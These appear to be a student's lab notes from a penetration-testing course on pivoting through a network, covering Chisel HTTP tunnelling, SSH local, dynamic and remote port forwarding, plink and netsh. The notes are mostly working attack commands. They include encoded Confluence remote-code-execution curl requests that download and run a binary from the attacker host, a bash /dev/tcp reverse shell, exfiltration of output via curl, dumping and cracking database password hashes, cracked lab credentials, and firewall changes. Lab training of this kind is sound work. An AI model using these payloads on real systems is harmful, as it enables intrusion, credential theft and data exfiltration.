Windows

HTTP Tunneling with Chisel

Provided IP: 192.168.45.209

CONFLUENCE01: 192.168.177.63

PGDATABASE01: 10.4.177.215

Payload: wget 192.168.45.209/chisel -O /tmp/chisel && chmod +x /tmp/chisel
Encoded: wget%20192.168.45.209/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel

Curl Request
curl <http://192.168.177.63:8090/$>{new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','wget 192.168.45.209/chisel -O /tmp/chisel && chmod +x /tmp/chisel').start()")}/

Encoded
curl <http://192.168.177.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.45.209/chisel%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%27%29.start%28%29%22%29%7D/>

Payload: /tmp/chisel client 192.168.45.209:8080 R:socks &> /tmp/output; curl --data @/tmp/output <http://192.168.45.209:8080/>
Encoded: /tmp/chisel%20client%20192.168.45.209:8080%20R:socks%20%3E%20/dev/null%202%3E%261%20%26

Curl Request
curl <http://192.168.177.63:8090/$>{new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','/tmp/chisel client 192.168.45.209:8080 R:socks &> /tmp/output; curl --data @/tmp/output <http://192.168.45.209:8080/>').start()")}/

Encoded
curl <http://192.168.177.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.45.209:8080%20R:socks%20%26%3E%20/tmp/output%20%3B%20curl%20--data%20@/tmp/output%20http://192.168.45.209:8080/%27%29.start%28%29%22%29%7D/>

curl <http://192.168.177.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27wget%20192.168.45.209/chisel_old%20-O%20/tmp/chisel%20%26%26%20chmod%20%2Bx%20/tmp/chisel%27%29.start%28%29%22%29%7D/>
curl <http://192.168.177.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27/tmp/chisel%20client%20192.168.45.209:8080%20R:socks%20%26%3E%20/tmp/output%20%3B%20curl%20--data%20@/tmp/output%20http://192.168.45.209:8080/%27%29.start%28%29%22%29%7D/>

ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.177.215

SSH Local Port Forwarding

• Practice:

  Edge Device IP (CONFLUENCE01): 192.168.110.63 SSH server IP (PGDATABASE01): 10.4.110.215 Target IP (HRSHARES): 172.16.110.217

  Provided Attacker IP: 192.168.45.209

  Enumerating the edge device, we identify a remote code execution vulnerability we can exploit to obtain a reverse shell.\

On the attacker machine:
1. run nc -lnvp 4444
2. run the following curl command to initiate a reverse shell
curl -v <http://192.168.110.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.209/4444%200%3E%261%27%29.start%28%29%22%29%7D/>

1. Establish TTY functionality using python's pty module:
	python3 -c 'import pty; pty.spawn("/bin/bash")'

2. Initiate the SSH connection to the server, and specify the ports we are trying to forward
	ssh -N -L 0.0.0.0:5454:10.4.110.215:5432 database_admin@10.4.110.215
	Forwarding traffic from local port 5454 to ssh server on port 5432

psql -h 192.168.110.63 -p 5454 -U postgres
 > Using discovered password: D@t4basePassw0rd!
 
Enumeration:
1. \\l
2. \\c confluence
3. SELECT * from cwd_user
4. Extract all usrnames and their associated password hashes
5. Crack the hashes using hashcat (mode 12001 | Atlassian)

Discovered credentials:
hr_admin: Welcome1234
rdp_admin: P@ssw0rd!
database_admin: sqlpass123

ssh -N -L 0.0.0.0:4545:172.16.110.217:445 database_admin@10.4.110.215

smbclient -L //192.168.110.63 -p 4545 -U hr_admin --password Welcome1234
	> Identify a /scripts share
	
smbclient //192.168.110.63/scripts -p 4545 -U hr_admin --password Welcome1234
	> Initiate connection to the /scripts share
	
Enumerating the share, we eventually find our flag
ls -la, get provisioning.ps1; exit; cat provisioning.ps1

SSH Dynamic Port Forwarding

Run on the SSH client:		
	ssh -N -D 0.0.0.0:<Listening Port> <username>@<SSH server IP>

Now that the destination socket is dynamically assigned, we need to configure proxychains to facilitate the forwarding of traffic. After installing proxychains, we need to configure the proxy in /etc/proxychains.conf

Append: socks5 <proxy IP> <proxy Port>

Now on the attacker machine, we can run commands as if we are on the proxy machine, as long as we include the command proxychains at the start of the statement.

Examples:
	proxychains nmap -T4 -Pn -sT -p4800-4900 172.16.110.217
	proxychains ./ssh_dynamic_client -i 172.16.110.217 -p 4872

• SSH Remote Port Forwarding

  Because inbound traffic is much more restricted compared to outbound traffic, we may not always be able to SSH directly into a network and port forward from there.

  Which is why we perform remote SSH port forwarding, by initiating a SSH connection to our attacker machine, we are able to bind a listening port on our attacker machine to an internal address accessible via the SSH client.

  With the listening port bound to the attacker machine, the SSH client is now responsible for forwarding traffic.

Ensure the SSH is running on the attacker machine

Run on the SSH client:		
	ssh -N -R 0.0.0.0:<Listening Port>:<Target IP>:<Target Port> kali@<attacker IP>
	
Verify with: ss -ntplu

Now commands can be ran with the target IP being the attacker’s localhost, and it will be redirected to the specified target IP and Port

Example:
	psql -h 127.0.0.1 -p 2345 -U postgres
	
	\\l
	\\c hr_backup
	SELECT * FROM payroll;

• SSH Remote Dynamic Port Forwarding

  Like SSH Dynamic Port Forwarding, we are implementing the dynamic aspect to our SSH Remote Port Forwarding attack.

Ensure the SSH is running on the attacker machine

Run on the SSH client:		
	ssh -N -R <attacker listening Port> kali@<attacker IP>
	
Verify with: ss -ntplu

Like SSH Dynamic Port Forwarding, we will need proxychains to facilitate the forwarding of traffic. After installing proxychains, we need to configure the proxy in /etc/proxychains.conf

Append: socks5 127.0.0.1 <attacker listening Port>

Examples:
	proxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.4.50.64
	
	for i in $(seq 9000 9100); do proxychains ./executables/ssh_remote_dynamic_client -i 10.4.110.64 -p $i; done

• plink.exe

  • A cli version of Putty

  • Used to initiate an ssh connection to the attacker machine, to create a listening port on the attacker machine, which will be forwarded to the target IP and port

plink.exe -ssh -l kali -pw kali -R 
	127.0.0.1:<attacker listening port>:<target IP>:<target listening port> 
	<attacker IP>

• netsh.exe

  • Can be used to create a port forward with the port proxy subcontext

  • Requires administrative privileges to create a port forward on Windows

Creating a proxy using netsh
netsh interface portproxy add v4tov4 listenport=<edge listening port> listenaddress=<edge IP> connectport=<target port> connectaddress=<target IP>
	Example: netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.177.64 connectport=22 connectaddress=10.4.177.215

Permitting connection to the proxy port by adding firewall rules using netsh
netsh advfirewall firewall add rule name="<identifiable name>" protocol=TCP dir=in localip=<edge IP> localport=<edge listening port> action=allow
	Example: netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.177.64 localport=2222 action=allow

Verify with:
	Proxy config -
		netstat -anp TCP | find "<edge listening port>"
		netsh interface portproxy show all
	Firewall config -
		sudo nmap -sS <edge IP> -Pn -n -p<edge listening port>